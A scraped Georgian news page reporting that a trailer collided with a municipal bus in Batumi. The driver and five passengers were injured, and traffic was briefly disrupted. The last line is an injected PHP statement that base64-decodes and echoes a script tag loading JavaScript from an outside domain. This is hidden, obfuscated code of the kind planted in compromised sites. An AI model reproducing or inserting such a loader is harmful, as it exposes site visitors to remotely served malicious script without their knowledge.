celsiusi
ავერსი შნაიდერი
ბათუმში, თამარ მეფის გამზირზე მუნიციპალურ ავტობუსს ტრაილერი დაეჯახა. შემთხვევის შედეგად, მძღოლი და ხუთი მგზავრი დაშავდნენ.
 
სასწრაფო-სამედიცინო დახმარების ჯგუფმა ავტობუსის მძღოლი „მედცენტრში“, მგზავრები კი, კლინიკა „მედალფაში“ გადაიყვანა. მძღოლის მდგომარეობა სტაბილურია. ექიმის თქმით, დაშავებული კლინიკას მალე დატოვებს. რაც შეეხება დაშავებულ მგზავრებს, სამს მსუბუქი დაზიანებები ჰქონდა და ისინი ბინაზე უკვე გაწერეს, ორი კი, მსუბუქი ტვინის შერყევით, ამ დრომდე კლინიკაში რჩება.
 
ავტოსაგზაო შემთხვევის გამო, ბათუმი-ქობულეთის მაგისტრალზე გადაადგილება დროებით შეფერხებული იყო.
 
ფოტო: აჭარის ტელევიზია
496
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");